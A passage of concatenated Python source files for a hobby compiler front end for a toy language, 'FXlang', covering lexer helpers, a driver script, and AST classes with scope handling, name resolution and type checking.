            self.state = 'COMMENT_ML'

    # print tokens
    def dump_tokens(self):
        """Pretty-print the token stream as an aligned colored table."""
        cprint(f'{"ID":>3}| {"LN":>3}| {"TYPE":<22} | {"VALUE":<14}', 'cyan', attrs=['bold'])
        for index, token in enumerate(self.tokens):
            cprint(f'{index:>3}|'
                   f' {token.line_no:>3}|'
                   f' {token.type:<22} |'
                   f' {token.value:<14}',
                   'green', attrs=['bold'])

    # helper functions
    def is_letter(self):
        # ASCII-only on purpose: identifiers are restricted to [A-Za-z].
        c = self.curr_char
        return len(c) == 1 and (ord(c) in range(ord('A'), ord('Z') + 1) or ord(c) in range(ord('a'), ord('z') + 1))

    def is_ident_head(self):
        if self.curr_char == '_' or self.is_letter():
            return True
        else:
            return False

    def is_digit(self):
        return len(self.curr_char) == 1 and ord(self.curr_char) in range(ord('0'), ord('9') + 1)

    def err(self, msg, debug=False):
        """Raise a LexerError (or LexerDebugError with full machine state)."""
        # curr_input is unset until lex_all() starts (e.g. bad ctor args);
        # fall back to a location-less error instead of AttributeError.
        info = self.curr_input.get_char_info() if hasattr(self, 'curr_input') else [None, None, None]
        if debug:
            raise LexerDebugError(msg, *info, self.state, self.curr_char, self.buffer)
        else:
            raise LexerError(msg, *info)
--- FILE SEPARATOR ---
from sys import argv
from lexer import Input, Lexer
from parser import Parser, ASTPrinter, Scope
from errors import LexerError, ParserError, InputError, SemanticError, InternalError
# Driver: lex, parse, resolve names and type-check one sample file.
# Usage: python main.py [sample_name]  (defaults to tmp.fx).
samples_dir = 'FXlang_samples'
file_to_lex = f'{samples_dir}/tmp.fx'
if len(argv) == 2:
    file_to_lex = f'{samples_dir}/{argv[1]}'

try:
    source = Input(file_to_lex)
    lexer = Lexer([source])
    lexer.lex_all()
    lexer.dump_tokens()

    parser = Parser(source, lexer.tokens)
    root = parser.parse_program()
    ASTPrinter().print('root', root)

    root_scope = Scope()
    root.resolve_names(root_scope)
    root.check_types()
# todo wrap in CompilerError
except (InputError, LexerError, ParserError, SemanticError, InternalError) as err:
    # Every compiler error knows how to render itself.
    err.print_err()
--- FILE SEPARATOR ---
from .parser import Parser
from .ast_printer import ASTPrinter
from .ast import Scope
--- FILE SEPARATOR ---
from lexer import Token
from errors import SemanticError, InternalError
from termcolor import cprint
# make global variable
# curr_stack_slot = 0
def deb(msg):
    """Debugging print; a named hook so temporary call sites are greppable."""
    print(msg)
def semantic_error(message, token=None):
    """Report a semantic error without file context (legacy format: '???:line')."""
    if token and token.line_no:
        line_no = token.line_no
    else:
        line_no = '?'
    print(f'???:{line_no}: semantic error: {message}')
def semantic_error3(msg, token):
    """Report a semantic error with full file:line:pos context taken from *token*."""
    file, line, pos = token.get_char_info()
    cprint(f'SemanticERROR: {file}:{line}:{pos} {msg}', 'red', attrs=['bold'])
# todo: fold unify() and its numeric error codes into this function
def unify_types(type_0, type_1, token=None):
    """Check that two types unify; print a semantic error if they do not.

    Returns True on success, None after reporting a mismatch.
    """
    code = unify(type_0, type_1)
    if code == 0:
        return True
    if code == 1:
        semantic_error(f'type mismatch: expected({type_0.unwrap()}), got({type_1.unwrap()})')
    elif code == 2:
        # todo: this overlaps with per-operation type rules (e.g. bool cannot
        # participate in arithmetic, some values cannot be compared, etc.)
        semantic_error3(f'type kind mismatch: expected({type_0.kind}), got({type_1.kind})', token)
# Node.check_type_eq() <- maybe move this logic inside Node?
def unify(type_0, type_1):
    """Structurally compare two type nodes.

    Returns 0 when they unify, 1 when their classes differ, 2 when two
    primitive types have different kinds.  A falsy type on either side is
    treated as "unknown" and unifies with anything.
    """
    if not type_0 or not type_1:
        return 0  # todo: should a missing type be an error instead?
    if type_0.__class__ != type_1.__class__:
        return 1
    # From here on both operands share the same class.
    if isinstance(type_0, TypePointer) and isinstance(type_1, TypePointer):
        return unify(type_0.inner, type_1.inner)
    if isinstance(type_0, TypePrim) and isinstance(type_1, TypePrim):
        return 2 if type_0.kind != type_1.kind else 0
    raise InternalError('unreachable')
class Scope:
    """Lexical scope mapping names to their declaring AST nodes, chained to
    an optional parent scope for outward lookup.

    Fix: the previous code raised the undefined name `TypeErr` (a NameError
    at runtime) where a TypeError was intended.
    """

    def __init__(self, parent_scope=None):
        self.members = {}
        self.parent_scope = parent_scope

    def add(self, name, node):
        """Register *node* under *name* (a Token); report duplicate names."""
        if not isinstance(name, Token) or not isinstance(node, Node):
            raise TypeError(f'Scope.add expects (Token, Node), got ({type(name)}, {type(node)})')
        # Allow overwriting a falsy placeholder entry; real duplicates error.
        if not self.members.get(name.value):
            self.members[name.value] = node
        else:
            semantic_error3(f'duplicate variable: {name.value}', name)

    def resolve(self, name):
        """Look *name* up through the scope chain; report undeclared names.

        Returns the declaring node, or None after reporting the error.
        """
        if not isinstance(name, Token):
            raise TypeError(f'Scope.resolve expects a Token, got {type(name)}')
        if name.value in self.members:
            # todo check for None/False placeholder entries
            return self.members[name.value]
        if self.parent_scope:
            return self.parent_scope.resolve(name)
        # todo print the same undeclared variable only once, with all its usages
        semantic_error3(f'undeclared variable: {name.value}', name)
# abstract
# virtual Type* check_types() = 0;
class Node(object):
    """Base class for every AST node.

    Provides the parent link (set by add_children), ancestor searches, and
    default resolve_names/check_types that flag missing overrides.
    """

    def __init__(self, parent=None):
        self.parent = parent
        self.target_node = None  # filled in by name resolution

    def unwrap(self):
        """Human-readable type name used in type-mismatch messages."""
        return self.__class__.__name__

    def has_address(self):
        # Overridden to True by l-value nodes.
        return False

    def is_mutable(self):
        return False

    def resolve_names(self, scope):
        raise InternalError(f'resolve names not implemented for: {self.__class__.__name__}')

    def add_children(self, *children):
        """Set self as parent of each child; flattens lists, skips falsy entries."""
        for child in children:
            if not child:
                pass  # ignore missing/optional children
            elif isinstance(child, list):
                for ch in child:
                    self.add_children(ch)
            elif isinstance(child, Node):
                child.parent = self
            else:
                raise InternalError('bad child')

    def find_ancestor(self, ancestor_class):
        """Nearest enclosing node that is an instance of *ancestor_class*, or None."""
        current_node = self.parent
        while current_node:
            if isinstance(current_node, ancestor_class):
                return current_node
            current_node = current_node.parent

    def ancestor_loop(self):
        """Nearest enclosing loop node (StmtWhile/StmtFor), or None."""
        current_node = self.parent
        while current_node:
            if isinstance(current_node, (StmtWhile, StmtFor)):
                return current_node
            current_node = current_node.parent
        return current_node

    def print_node(self, p):
        print(f'print not implemented for {self.__class__}')

    def check_types(self):
        raise InternalError(f'check_types not implemented for {self.__class__}')
class Program(Node):
    # Root AST node: the list of top-level declarations of one compilation
    # unit, plus the EOF token (used to locate "empty program" errors).
    def __init__(self, decls, eof):
        # add_children runs before Node.__init__; it only touches the
        # children's parent links, so the ordering is harmless.
        self.add_children(*decls)
        self.decls = decls
        self.eof = eof
        super().__init__()

    def print_node(self, p):
        p.print('decls', self.decls)

    def resolve_names(self, scope):
        # An empty program cannot contain 'main'; report at the EOF position.
        if not self.decls:
            raise SemanticError('no "main" function in a program', *self.eof.get_char_info())
        for decl in self.decls:
            scope.add(decl.name, decl)
        # NOTE(review): relies on `decl` leaking out of the loop above, so the
        # error points at the last declaration's name.
        if 'main' not in scope.members.keys():
            # todo is it correct to show token pos of last decl name?
            semantic_error3('no "main" function in a program', decl.name)
        for decl in self.decls:
            decl.resolve_names(scope)
        # todo return value?

    def check_types(self):
        for decl in self.decls:
            # 'main' additionally must return int.
            if decl.name.value == 'main':
                if not decl.ret_type.kind == 'int':
                    # todo use type token instead of fn name in error printing
                    semantic_error3('incorrect "main" signature - main function should return int', decl.name)
            decl.check_types()
# abstract
class Decl(Node):
    """Abstract base class for top-level declarations."""
    def __init__(self):
        super().__init__()
class DeclFn(Decl):
    """Function declaration: name, parameter list, return type and body block."""
    # attr_reader :name, :params, :ret_type, :body
    # attr_accessor :name
    # attr_accessor :params
    # attr_accessor :ret_type
    # attr_accessor :body
    # attr_reader :entry_label
    # attr_reader :builtin
    num_locals: int
    local_count: int
    # todo params -> *args?
    def __init__(self, name, params, ret_type, body):
        self.add_children(params + [ret_type] + [body])
        self.name = name
        self.params = params
        self.ret_type = ret_type
        self.body = body
        # todo remove?
        self.type = None
        # todo whatis?
        # self.entry_label = Label.new
        super().__init__()
    def print_node(self, p):
        p.print('name', self.name)
        p.print('params', self.params)
        p.print('ret_type', self.ret_type)
        p.print('body', self.body)
    def resolve_names(self, scope):
        # Parameters live in a fresh child scope of the enclosing scope.
        # scope.add(@name, self)  -- was done here in the 2017 version
        inner_scope = Scope(scope)
        # curr_stack_slot = 0 # todo or $slot_index
        if self.name.value == 'main':
            if self.params:
                semantic_error3('incorrect "main" signature - main function should not have any parameters', self.name)
        for param in self.params:
            inner_scope.add(param.name, param)
        # self.num_locals = curr_stack_slot
        # self.local_count = curr_stack_slot - len(self.params)
        self.body.resolve_names(inner_scope)
    def check_types(self):
        for param in self.params:
            param.check_types()
        self.body.check_types()
class Param(Node):
    """A single function parameter: a name plus its declared type."""
    # attr_accessor :slot_index
    def __init__(self, name, type_):
        self.add_children(type_)
        self.name = name
        self.type = type_
        super().__init__()
    def print_node(self, p):
        p.print('name', self.name)
        p.print('type', self.type)
    def check_types(self):
        # A parameter must carry a value: 'void' (or pointer to void) is rejected.
        if self.type.has_value():
            return
        # todo show pos of param type not of param name
        semantic_error3(f'parameter\'s type cannot be void or pointer to void', self.name)
class StmtBlock(Node):
    """A braced sequence of statements; opens its own scope when resolved."""
    def __init__(self, stmts):
        self.add_children(stmts)
        self.stmts = stmts
        super().__init__()
    def print_node(self, p):
        p.print('stmts', self.stmts)
    def resolve_names(self, scope):
        # Every block introduces a fresh child scope.
        block_scope = Scope(scope)
        for statement in self.stmts:
            statement.resolve_names(block_scope)
    def check_types(self):
        for statement in self.stmts:
            statement.check_types()
# abstract
class Stmt(Node):
    """Abstract base class for statements."""
    def __init__(self):
        super().__init__()
class IfBranch(Node):
    """One (condition, body) arm of an if/elif chain."""
    def __init__(self, cond, body):
        self.add_children(cond, body)
        self.cond = cond
        self.body = body
        super().__init__()
    def print_node(self, p):
        p.print('cond', self.cond)
        p.print('body', self.body)
    def resolve_names(self, scope):
        for part in (self.cond, self.body):
            part.resolve_names(scope)
    def check_types(self):
        for part in (self.cond, self.body):
            part.check_types()
class StmtIf(Stmt):
    """if/elif/else statement: IfBranch arms plus an optional else block."""
    def __init__(self, branches, else_block=None):
        self.add_children(branches, else_block)
        self.branches = branches
        self.else_block = else_block
        super().__init__()
    def print_node(self, p):
        for idx, branch in enumerate(self.branches):
            p.print(f'branch[{idx}]', branch)
        if self.else_block:
            p.print(f'else', self.else_block)
    def resolve_names(self, scope):
        for branch in self.branches:
            branch.resolve_names(scope)
        if self.else_block:
            self.else_block.resolve_names(scope)
    def check_types(self):
        # Every arm's condition must unify with bool; bodies are plain blocks.
        for branch in self.branches:
            cond_type = branch.cond.check_types()
            unify_types(TYPE_BOOL, cond_type, branch.cond.get_token())
            branch.body.check_types()
        if self.else_block:
            self.else_block.check_types()
class StmtFor(Stmt):
    """for(init; cond; step) { body } loop statement."""
    def __init__(self, for_init, for_cond, for_step, for_body):
        self.add_children(for_init, for_cond, for_step, for_body)
        self.for_init = for_init
        self.for_cond = for_cond
        self.for_step = for_step
        self.for_body = for_body
        super().__init__()
    def _parts(self):
        # The four sub-nodes in source order.
        return (self.for_init, self.for_cond, self.for_step, self.for_body)
    def print_node(self, p):
        p.print('init', self.for_init)
        p.print('cond', self.for_cond)
        p.print('step', self.for_step)
        p.print('body', self.for_body)
    def resolve_names(self, scope):
        for part in self._parts():
            part.resolve_names(scope)
    def check_types(self):
        for part in self._parts():
            part.check_types()
# similar to the if statement:
# check the types in the condition
# ...
class StmtWhile(Stmt):
    """while(cond) { body } loop statement."""
    def __init__(self, cond, body):
        self.add_children(cond, body)
        self.cond = cond
        self.body = body
        super().__init__()
    def print_node(self, p):
        p.print('cond', self.cond)
        p.print('body', self.body)
    def resolve_names(self, scope):
        self.cond.resolve_names(scope)
        self.body.resolve_names(scope)
    def check_types(self):
        # The loop condition must be a boolean expression.
        condition_type = self.cond.check_types()
        unify_types(condition_type, TYPE_BOOL, self.cond.get_token())
        self.body.check_types()
class StmtControlFlow(Stmt):
    """Base class for break/continue; only legal inside a loop."""
    def __init__(self, keyword):
        self.keyword = keyword
        super().__init__()
    def print_node(self, p):
        p.print('keyword', self.keyword)
    def resolve_names(self, scope):
        # Bind to the innermost enclosing loop; error when there is none.
        self.target_node = self.ancestor_loop()
        if self.target_node:
            return
        # todo rm this hack
        kw = "break" if "BREAK" in self.keyword.type else "continue"
        semantic_error3(f'"{kw}" not inside a loop statement', self.keyword)
    def check_types(self):
        pass
class StmtBreak(StmtControlFlow):
    """'break' statement node; all behavior inherited from StmtControlFlow."""
class StmtContinue(StmtControlFlow):
    """'continue' statement node; all behavior inherited from StmtControlFlow."""
# so what is our return type here?
class StmtReturn(Stmt):
    """'return' statement with an optional value expression."""
    # unique_ptr<Expr> value;
    def __init__(self, return_kw, value=None):
        self.add_children(value)
        self.return_kw = return_kw  # the 'return' keyword token (error position for bare returns)
        self.value = value
        super().__init__()
    def print_node(self, p):
        if not self.value:
            p.print('keyword', self.return_kw)
        else:
            p.print('value', self.value)
    def resolve_names(self, scope):
        if self.value:
            self.value.resolve_names(scope)
    # todo ret_type <- method?
    def check_types(self):
        # A bare 'return' yields void; otherwise check the value expression.
        # ret_type = ancestor_fn.ret_type
        # ret_type = find_ancestor(&DeclFn)
        if self.value:
            value_type = self.value.check_types()
            token = self.value.get_token()
        else:
            value_type = TYPE_VOID
            token = self.return_kw
        # The value's type must unify with the enclosing function's return type.
        ret_type = self.find_ancestor(DeclFn).ret_type
        # todo pythonize?
        # &. is Ruby safe navigation: calls the method only on a non-nil receiver
        unify_types(ret_type, value_type, token)
        # unify_types(ret_type, value_type, @return_kw)
# var a: int = 5
class StmtVarDecl(Stmt):
    """Variable declaration statement: type, name and an optional initializer."""
    # attr_accessor :slot_index
    def __init__(self, name, type_, value=None):
        self.add_children(type_, value)
        self.name = name
        self.type = type_
        self.value = value  # optional initializer expression
        super().__init__()
    def print_node(self, p):
        p.print('name', self.name)
        p.print('type', self.type)
        if self.value:
            p.print('value', self.value)
    def resolve_names(self, scope):
        scope.add(self.name, self)
        if self.value:
            self.value.resolve_names(scope)
    def check_types(self):
        if not self.type.has_value():
            # todo maybe print token of a type, not of a name
            semantic_error3(f'variable\'s type cannot be void or pointer to void', self.name)
        if self.value:
            value_type = self.value.check_types()
            # Pass the initializer's token so a type mismatch is reported at
            # the value -- consistent with the other unify_types call sites
            # (the original omitted the token, losing the error position).
            unify_types(self.type, value_type, self.value.get_token())
class StmtAssign(Stmt):
    """Assignment statement: lhs (op)= value, where op may be a compound form."""
    def __init__(self, lhs, op, value):
        self.add_children(lhs, value)
        self.lhs = lhs
        self.op = op  # one of EQUALS / PLUS_EQUALS / ... (see the parser's assign_ops)
        self.value = value
        super().__init__()
    def print_node(self, p):
        # or lhs = target
        p.print('lhs', self.lhs)
        p.print_single('op', self.op)
        p.print('value', self.value)
        # p.print('target_node', @target_node.class.to_s)
    def resolve_names(self, scope):
        # todo lhs=var
        # self.lhs is an ExprVar (or unary wrapper), not a token: resolution must
        # descend until it finds the token (pointers may be nested inside, etc.)
        # todo put this under suspicion
        self.target_node = self.lhs.resolve_names(scope)
        # self.target_node = scope.resolve(self.lhs)
        self.value.resolve_names(scope)
    def check_types(self):
        target_type = None
        # todo for ExprUnary this is not necessarily the target node's type
        if self.target_node:
            target_type = self.lhs.check_types()
            # target_type = @target.type
            # print(target_type.inner.kind)
        # the value always has some type; no need to special-case void here
        value_type = self.value.check_types()
        # todo return?
        # target_node was already assigned during name resolution
        # unifyt_types(@target_node&.type, value_type)
        # if target_type is missing we could pass nil here and let unify report it
        if target_type:
            # Compound assignment (+=, -=, ...) requires an arithmetic target type.
            if self.op != "EQUALS" and not target_type.is_arithmetic():
                semantic_error3(f'cannot perform arithmetic assign operation with this type: {target_type.kind}',
                                self.lhs.name)
            unify_types(target_type, value_type, self.value.get_token())
        else:
            raise InternalError("no target type")
# def to_s
# '%s' % [@kind]
# end
class StmtExpr(Stmt):
    """An expression used in statement position (e.g. a bare function call)."""
    def __init__(self, expr):
        self.add_children(expr)
        self.expr = expr
        super().__init__()
    def print_node(self, p):
        p.print('expr', self.expr)
    def resolve_names(self, scope):
        self.expr.resolve_names(scope)
    def check_types(self):
        # Delegate: the statement's type is the wrapped expression's type.
        return self.expr.check_types()
# class StmtLet
# def resolve_names(scope)
# scope.add(@name, self)
# end
# end
# abstract
class Expr(Node):
    """Abstract base class for expressions."""
    def __init__(self):
        super().__init__()
# foo(a, b, c + 5)
class ExprFnCall(Expr):
    """Function-call expression: name(arg, ...)."""
    def __init__(self, name, args):
        # add_children() flattens lists itself, so one call is enough.
        # (The original also called add_children(*args), re-parenting every
        # argument a second time for no effect.)
        self.add_children(args)
        self.name = name
        self.args = args
        # 'in'/'disp' are language built-ins with no user declaration to resolve.
        if self.name.value in ('in', 'disp'):
            self.builtin = True
        else:
            self.builtin = False
        super().__init__()
    def print_node(self, p):
        p.print('name', self.name)
        p.print('args', self.args)
        # p.print('builtin', self.builtin)
    def get_token(self):
        return self.name
    def resolve_names(self, scope):
        if not self.builtin:
            self.target_node = scope.resolve(self.name)
        else:
            # self.target_node = ???
            pass  # todo
        for arg in self.args:
            arg.resolve_names(scope)
    def check_types(self):
        # Type-check every argument first.
        arg_types = [arg.check_types() for arg in self.args]
        # Does the call target exist at all?
        # TODO presumably a builtin lands here (no target_node resolved)
        if not self.target_node:
            return
        elif not isinstance(self.target_node, DeclFn):
            semantic_error3('the call target is not a function', self.name)
            return
        # At this point the target is a known function declaration.
        # todo is type() a fn?
        param_types = [param.type for param in self.target_node.params]
        if len(param_types) != len(arg_types):
            semantic_error3(f'invalid argument count; expected {len(param_types)}, got {len(arg_types)}', self.name)
        # Check as many positions as both lists provide so a count mismatch
        # still yields useful per-argument type errors for the shared prefix.
        param_count = min(len(param_types), len(arg_types))
        for i in range(0, param_count):
            param_type = param_types[i]
            arg_type = arg_types[i]
            unify_types(param_type, arg_type, self.args[i].get_token())
        return self.target_node.ret_type
class ExprBinary(Expr):
    """Abstract binary expression: left <op> right (kind names the operator family)."""
    def __init__(self, kind, op, left, right):
        self.add_children(left, right)
        self.kind = kind
        self.op = op
        self.left = left
        self.right = right
        self.type = None
        super().__init__()
    def print_node(self, p):
        p.print_single('kind', self.kind)
        p.print_single('op', self.op)
        p.print('left', self.left)
        p.print('right', self.right)
    def get_token(self):
        # Errors are reported at the leftmost operand's token.
        return self.left.get_token()
    def resolve_names(self, scope):
        for operand in (self.left, self.right):
            operand.resolve_names(scope)
# we cannot write one shared type-checking class for all binary operators
# class ExprBinary
#   ExprArith:      T + T  -> T
#   ExprLogic:      B | B  -> B
#   ExprEquality:   T == T -> B
#   ExprComparison: T < T  -> B
# Arithmetic expressions: a + b, a * b
# Comparison expressions: a > b, a < b => BOOL
# Boolean expressions: a && b, a || b
# Arithmatic Exprs: + - / * %
# Relational Exprs: < > >= <=
# Equality Exprs: != ==
# Boolean Exprs: && ||
# type+type -> type; is_arithmetic (bool+bool wrong, etc.)
# ExprBinArith: TYPE + TYPE -> TYPE; is_arithmetic
# class ExprBinArith < ExprBinary
# end
# becomes an abstract class. Also change this in the parser so it returns the concrete classes rather than ExprBinary
class ExprBinArith(ExprBinary):
    """Arithmetic binary expression: TYPE op TYPE -> TYPE (operands must be arithmetic)."""
    # this arithmetic-expression handling may be extended somewhat later
    def check_types(self):
        left_type = self.left.check_types()
        right_type = self.right.check_types()
        # keep in mind the left side may also come back as void!
        if left_type and left_type.is_arithmetic():
            unify_types(left_type, right_type, self.right.get_token())
        else:
            # exact error position unknown here
            # todo pointers error (kind->unwrap)
            semantic_error3(f'cannot perform arithmetic operations with this type: {left_type.kind}',
                            self.left.get_token())
        return left_type  # the operand type is also the result type
# ExprBinComparison: TYPE < TYPE -> BOOL; is_comparable
# class ExprBinComparison < ExprBinary
# end
# type < type -> bool; is_comparable (we do not really compare bools)
# monotonically increasing
# ExprBinEquality: type == type -> bool; has_value (only == or !=; must not be void)
class ExprBinComparison(ExprBinary):  # > < >= <=
    """Ordering comparison: TYPE < TYPE -> bool (operands must be comparable)."""
    def check_types(self):
        left_type = self.left.check_types()
        right_type = self.right.check_types()
        # todo define curr_token for errors
        # Only the left side is vetted directly; the right side's compatibility
        # is established by unifying it against the left type.
        if left_type and left_type.is_comparable():
            unify_types(left_type, right_type)
        else:
            # fixme this does not return object with token attribute
            semantic_error3(f'cannot compare values of this type: {left_type.kind}', self.left.get_token())
        # A comparison always yields bool. Return the shared singleton for
        # consistency with ExprBinLogic instead of allocating a fresh TypePrim.
        return TYPE_BOOL
# ExprBinEquality: TYPE == TYPE -> BOOL; has_value
# class ExprBinEquality < ExprBinary
# end
class ExprBinEquality(ExprBinary):
    """Equality expression: TYPE == TYPE -> bool (operands must carry a value)."""
    def check_types(self):
        left_type = self.left.check_types()
        right_type = self.right.check_types()
        if left_type and left_type.has_value():
            # todo should i print more understandable error here?
            unify_types(left_type, right_type)
        else:
            semantic_error3(f'this type has no value to compare: {left_type.kind}', self.left.get_token())
        # Equality always yields bool. Return the shared singleton for
        # consistency with ExprBinLogic/ExprBinComparison.
        return TYPE_BOOL
# ExprBinLogic: BOOL || BOOL -> BOOL
# class ExprBinLogic < ExprBinary
# end
# both operands are always bool
class ExprBinLogic(ExprBinary):
    """Logical expression (&&, ||): both operands must be bool; result is bool."""
    def check_types(self):
        # Both operands are checked first, then unified, so error ordering
        # matches the other binary-expression checkers.
        lhs_type = self.left.check_types()
        rhs_type = self.right.check_types()
        unify_types(TYPE_BOOL, lhs_type, self.left.get_token())
        # TODO reverse order everywhere as well (left-param - expected type, right-param - got)
        unify_types(TYPE_BOOL, rhs_type, self.right.get_token())
        return TYPE_BOOL
# class ExprPrio < Expr
# def initialize(inner)
# @inner = inner
# end
#
# def print(p)
# p.print 'inner', @inner
# end
# def resolve_names(self, scope):
# self.inner.resolve_names(scope)
# end
# end
class ExprUnary(Expr):
    """Unary expression: <op> inner (INCR/DECR/NOT; deref and address-of subclass this)."""
    def __init__(self, inner, op):
        self.add_children(inner)
        self.inner = inner
        self.op = op
        super().__init__()
    def print_node(self, p):
        p.print('inner', self.inner)
        p.print_single('op', self.op)
    def resolve_names(self, scope):
        # Propagate the resolved target outward so enclosing nodes
        # (e.g. StmtAssign) can see what the wrapped expression refers to.
        self.target_node = self.inner.resolve_names(scope)
        return self.target_node
    def get_token(self):
        inner = self.inner
        # todo remove this while loop
        while isinstance(inner, TypePointer):
            inner = inner.inner
        return inner.get_token()
    def check_types(self):
        # A plain unary expression may not be the left-hand side of an assignment.
        if isinstance(self.parent, StmtAssign) and self.parent.lhs == self:
            # todo is this error formulated correctly?
            # todo add token info for error handling here
            semantic_error3('assignment lvalue cannot be unary expression', self.get_token())
            return TypeErr(self.get_token())
        elif not self.op == 'NOT':
            # INCR/DECR: the operand must resolve to something with a type.
            if self.target_node:
                return self.target_node.type
            else:
                semantic_error3('cannot apply unary operator on that which follows the operator', self.get_token())
                return TypeErr(self.get_token())
        else:
            # Logical NOT requires (and returns) a boolean operand type.
            type_ = self.inner.check_types()
            unify_types(TYPE_BOOL, type_, self.get_token())
            return type_
class ExprDeref(ExprUnary):
    """Pointer dereference expression; usable as a mutable assignment target."""
    def has_address(self):
        return True
    def is_mutable(self):
        return True
    def check_types(self):
        """Walk one TypePointer level per nested ExprDeref and return what remains.

        Errors when the target is not a pointer at all or when the number of
        dereferences exceeds the declared pointer depth.
        """
        # todo maybe useless check, since has_address() exists
        if not self.target_node:
            semantic_error3('cannot dereference that which follows the dereference operator', self.get_token())
            return TypeErr(self.get_token())
        elif not isinstance(self.target_node.type, TypePointer):
            semantic_error3('value to dereference is not a pointer', self.get_token())
            # todo duplicates here, since it is already type error, because it is function name without parenthesis?
            return TypeErr(self.get_token())
        # todo about the PTR_ADDR possibility here??
        elif self.inner.has_address():
            inner = self.inner
            target_inner = self.target_node.type.inner
            # Peel one pointer level per nested dereference node.
            while isinstance(inner, ExprDeref):
                if isinstance(target_inner, TypePointer):
                    inner = inner.inner
                    target_inner = target_inner.inner
                else:
                    # todo add token info for error handling here
                    semantic_error3(f'primary type ({target_inner.kind}) cannot be dereferenced', self.get_token())
                    return TypeErr(self.get_token())
            return target_inner
        else:
            # todo add token info for error handling here
            # todo to prevent ex. $++a;
            # todo but if a is int, not a pointer, then we get the error above (var deref is not a pointer type),
            # todo ...and it is not correct
            semantic_error3('value to dereference is not a pointer', self.get_token())
            return TypeErr(self.get_token())
class ExprAddress(ExprUnary):
    """Address-of expression; yields a pointer to the operand's type."""
    def has_address(self):
        return True
    def check_types(self):
        if self.inner.has_address():
            return TypePointer(self.inner.check_types())
        # todo is it pointer, pointer value literal or just int?
        else:
            # todo now exprUnary name token is used for error, not the token
            # todo ...going after the PTR_ADDR operator
            semantic_error3('wrong value to address', self.inner.get_token())
            # Return an error type instead of an implicit None so callers that
            # inspect the result (unify_types, .kind access) don't crash --
            # consistent with the other error paths in this module.
            return TypeErr(self.inner.get_token())
class ExprVar(Expr):
    """Variable reference; resolves to its declaration during name resolution."""
    def __init__(self, name):
        self.name = name
        # todo why is that?
        # self.target = None
        super().__init__()
    def print_node(self, p):
        p.print('name', self.name)
    def get_token(self):
        return self.name
    def has_address(self):
        return True
    def is_mutable(self):
        return True
    def resolve_names(self, scope):
        self.target_node = scope.resolve(self.name)
        return self.target_node
    def check_types(self):
        # target_node was already assigned to this var during name resolution
        # @target_node&.type  (if the lhs is nil, or both sides are nil, unify_types is skipped -- remember)
        # todo add raise InternalError on else
        if self.target_node:  # or @target.respond_to?(:type)
            if isinstance(self.target_node, DeclFn):
                semantic_error3('function name cannot be used as a variable', self.name)
                # fixme temp fix here
                return TypeErr(self.name)
            return self.target_node.type
        # todo repeat for every class
        else:
            # Unresolved name: return an error type so checking can continue.
            return TypeErr(self.name)
class ExprLit(Expr):
    """Literal expression (int/float/bool/char/string)."""
    def __init__(self, lit, kind):
        self.lit = lit
        self.kind = kind
        super().__init__()
    def print_node(self, p):
        p.print('lit', self.lit)
        p.print_single('kind', self.kind)
    # todo some objs have this fn, some do not. Is it ok?
    # todo ...maybe move this fn to ExprBinary class
    def get_token(self):
        return self.lit
    def resolve_names(self, scope):
        pass  # literals reference no names
    def check_types(self):
        # Map the literal's token type onto the corresponding primitive type.
        token_type = self.lit.type
        if token_type == 'LIT_INT':
            return TYPE_INT
        if token_type == 'LIT_FLOAT':
            return TYPE_FLOAT
        if token_type in ('KW_TRUE', 'KW_FALSE'):
            return TYPE_BOOL
        if token_type == 'LIT_CHAR':
            return TYPE_CHAR
        if token_type == 'LIT_STR':
            return TYPE_STRING
        raise InternalError('Bad ExprLit token')
# abstract
class Type(Node):
    """Abstract base for type nodes; capability predicates default to False."""
    def __init__(self):
        super().__init__()
    def is_arithmetic(self):
        return False
    def has_value(self):
        return False
    def is_comparable(self):
        return False
# class TypeBool < TypePrim # or tsg Type?
# def print(p)
# end
#
# def to_s
# 'bool'
# end
# end
#
# class TypeInt < TypePrim
# def print(p)
# end
#
# def to_s
# 'int'
# end
# end
#
# class TypeVoid < TypePrim
# def print(p)
# end
#
# def to_s
# 'void'
# end
# end
#
class TypePointer(Type):
    """Pointer type wrapping an inner type (possibly another pointer)."""
    def __init__(self, inner):
        self.add_children(inner)
        self.inner = inner
        super().__init__()
    def print_node(self, p):
        p.print('inner', self.inner)
    def has_value(self):
        # A pointer is usable wherever its pointee type carries a value.
        return self.inner.has_value()
    def unwrap(self, depth=1):
        """Render the type as 'kind$$...' with one '$' per pointer level."""
        pointee = self.inner
        if isinstance(pointee, TypePointer):
            return pointee.unwrap(depth + 1)
        if isinstance(pointee, TypePrim):
            return f'{pointee.kind}{depth * "$"}'
        raise InternalError('pointer to something other than primary type')
# todo is it needed?
# def resolve_names(self, scope):
# ...
class TypePrim(Type):
    """Primitive type node (int/float/bool/char/string/void)."""
    def __init__(self, kind, token=None):
        self.kind = kind
        # todo is token attribute needed?
        self.token = token
        super().__init__()
    def print_node(self, p):
        p.print_single('kind', self.kind)
    def is_arithmetic(self):
        # Only the numeric primitives take part in arithmetic.
        return self.kind in ('float', 'int')
    def has_value(self):
        # Every primitive except 'void' carries a usable value.
        return self.kind != 'void'
    def is_comparable(self):
        # Ordering comparisons are defined for the numeric primitives only.
        return self.kind in ('int', 'float')
    def unwrap(self):
        return self.kind
class TypeErr(Type):
    """Sentinel type produced after a semantic error; supports no operations."""
    def __init__(self, token):
        self.kind = 'ERROR'
        self.token = token
        super().__init__()
    def is_arithmetic(self):
        return False
    def has_value(self):
        return False
    def is_comparable(self):
        return False
    def unwrap(self):
        return self.kind
# todo move these definitions and others to centralized place somewhere
# Shared singleton instances of the primitive types, returned by the
# literal/operator type checkers throughout this module.
TYPE_VOID = TypePrim('void')
TYPE_INT = TypePrim('int')
TYPE_FLOAT = TypePrim('float')
TYPE_BOOL = TypePrim('bool')
TYPE_CHAR = TypePrim('char')
TYPE_STRING = TypePrim('string')
--- FILE SEPARATOR ---
from lexer import Token
from errors import InternalError
from .ast import Node
from termcolor import cprint
class ASTPrinter:
    """Pretty-printer that walks AST nodes and renders an indented colored tree."""
    def __init__(self):
        self.indent_level = 0
    def print(self, title, obj):
        # Dispatch on the runtime kind of obj. Falsy non-collection values
        # (None, the parser's '' placeholders) are printed as NULL.
        if isinstance(obj, Node):
            self.print_node(title, obj)
        elif isinstance(obj, list):
            self.print_array(title, obj)
        elif isinstance(obj, Token):
            self.print_token(title, obj)
        elif not obj:
            self.print_single(title, 'NULL')
        else:
            raise InternalError(f'bad argument {obj.__class__.__name__}')
    def print_array(self, title, array):
        if not array:
            self.print_single(title, '[]')
        for index, element in enumerate(array):
